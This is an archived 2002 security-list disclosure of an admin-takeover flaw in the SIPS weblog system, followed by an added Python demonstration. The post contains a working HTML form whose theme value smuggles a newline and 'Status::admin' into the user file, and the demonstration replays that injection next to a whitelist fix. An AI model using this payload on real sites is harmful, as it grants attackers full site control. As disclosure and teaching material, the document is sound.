SIPS - vulnerable to anyone gaining admin access.

From: b0iler _ (b0ilerat_private)
Date: Mon Feb 11 2002 - 22:13:11 PST


    #!/exploit/by/b0iler
    # sips - http://sourceforge.net/projects/sips/
    # versions lower than 0.3.1
    
    Taken from freshmeat: "About: SIPS is an integrated Weblog and link-indexing 
    system written in PHP. It is aimed at those with access to databaseless, 
    PHP-enabled Web servers who want to run a Weblog site like Slashdot and/or a 
    simple link index like Yahoo!."
    
    Ok, this one took a while to find since the code is long, but at least it was 
    fairly easy to read.  The script works much like phpnuke or slashcode, SIPS 
    stands for Simple Internet Publishing System.  The problem that I found was 
    when a user selects a theme to use it is written in their database file.  
    Then when a user goes to use admin.php it just checks if the password for 
    the user is correct and if they have the value Status equal to admin in 
    their database. So I did a little playing around and got a theme to do a 
    linebreak and write Status::admin onto the end of the user's database.  This 
    makes the user an admin of the script giving them complete control over the 
    site.
    
    Key to securing this code is to filter all input, even if you think it won't 
    be changed by the user.. it can be.  Also checking to make sure the theme 
    exists might be good.  To exploit this we just need to change the theme's 
    page to something like this:
    
    <form action="http://www.site.com/sips/htdocs/preferences.php" 
    method="post">
    <input type="hidden" name="op" value="theme">
    <input type="hidden" name="action" value="settheme">
    <select name="themename">
    <option value="default
    Status::admin
    ">Exploited</option>
    </select>
    <input type="submit" value="Set Theme"></form>
    
    Here we submit a theme with the value of:
    
    Default -linebreak
    Status::admin -linebreak (SIPS chops the theme input).
    
    This will change an account from something like this:
    
    bash-2.03$ cat user
    Password::660120d6fbc1sn241be39290636b2942
    Email::b0ilerat_private
    Theme::default
    Timezone::Greenwich Mean
    
    to something like this:
    
    bash-2.03$ cat user
    Password::660120d6fbc1sn241be39290636b2942
    Email::b0ilerat_private
    Timezone::Greenwich Mean
    Theme::default
    Status::admin
    
    The Status::admin allows you to use 
    http://www.site.com/sips/htdocs/admin/index.php, which will give you total 
    control over SIPS (pretty much the whole site).
    
    The author was contacted on 2/1/02 and replied the same day.  Author updated 
    to version 0.3.1 on 2/8/02 and wrote a very nice page detailing the problem 
    and possible solutions: http://sips.sourceforge.net/adminvul.html
    
    -http://b0iler.advknowledge.net
    
    
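The following is an added example, not code from the post or from SIPS. It models the flat-file `Key::Value` user record the post shows, so that the newline injection and the two fixes the post recommends (filter the input, check that the theme exists) can be run side by side. The record layout and the `Status::admin` check follow the post; the `INSTALLED_THEMES` list, the field names of the sample record and the function names are assumptions for illustration.

```python
import re

# Added example, not SIPS's code: a small model of the flat-file "Key::Value"
# user record described in the post. It shows how a newline inside the theme
# value appends an extra Status::admin field, and how a whitelist stops it.

# Constructed sample record in the shape the post shows (placeholder values).
SAMPLE_USER = (
    "Password::660120d6fbc1sn241be39290636b2942\n"
    "Email::user@example.invalid\n"
    "Theme::default\n"
    "Timezone::Greenwich Mean\n"
)

# The value the post's form submits: theme name, linebreak, injected field.
PAYLOAD = "default\nStatus::admin\n"

# Assumed list of installed themes (hypothetical names); a real application
# would build this from its theme directory rather than hard-coding it.
INSTALLED_THEMES = frozenset({"default", "plain"})


class ThemeError(ValueError):
    """Raised by the hardened setter when the theme name is rejected."""


def parse_record(text):
    """Parse 'Key::Value' lines into a dict.

    A later line for the same key overwrites an earlier one, so an injected
    'Status::admin' near the end of the file takes effect.
    """
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition("::")
        if sep:
            fields[key] = value
    return fields


def serialize_record(fields):
    """Write fields back as 'Key::Value' lines, trusting every value."""
    return "".join(f"{key}::{value}\n" for key, value in fields.items())


def set_theme_vulnerable(record_text, themename):
    """Store the submitted theme name with no validation at all."""
    fields = parse_record(record_text)
    fields["Theme"] = themename
    return serialize_record(fields)


def theme_is_valid(themename):
    """Accept only an installed theme whose name uses safe characters."""
    well_formed = re.fullmatch(r"[A-Za-z0-9_-]+", themename) is not None
    return well_formed and themename in INSTALLED_THEMES


def serialize_record_safe(fields):
    """Refuse any key or value that could start a new line or a new field.

    This is a second line of defence behind the whitelist, so that no other
    code path can smuggle a field into the record either.
    """
    for key, value in fields.items():
        for part in (key, value):
            if "\n" in part or "\r" in part or "::" in part:
                raise ValueError(f"unsafe record field: {key!r}")
    return serialize_record(fields)


def set_theme_hardened(record_text, themename):
    """Store the theme only if it names an installed theme."""
    if not theme_is_valid(themename):
        raise ThemeError(f"unknown or malformed theme: {themename!r}")
    fields = parse_record(record_text)
    fields["Theme"] = themename
    return serialize_record_safe(fields)


def is_admin(record_text):
    """The check the post describes admin.php making: Status equal to admin."""
    return parse_record(record_text).get("Status") == "admin"


if __name__ == "__main__":
    tampered = set_theme_vulnerable(SAMPLE_USER, PAYLOAD)
    print(tampered)
    print("admin after vulnerable write:", is_admin(tampered))
    try:
        set_theme_hardened(SAMPLE_USER, PAYLOAD)
    except ThemeError as exc:
        print("hardened write rejected:", exc)
```

Running the block prints the tampered record with `Status::admin` on its own line, exactly the shape of the second `cat user` listing above, and then shows the hardened setter rejecting the same input. Whitelisting against the installed themes is the check that matters; the extra newline and `::` filter in the serializer only guards against a future code path that forgets the whitelist.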
    



    This archive was generated by hypermail 2b30 : Wed Feb 13 2002 - 14:52:29 PST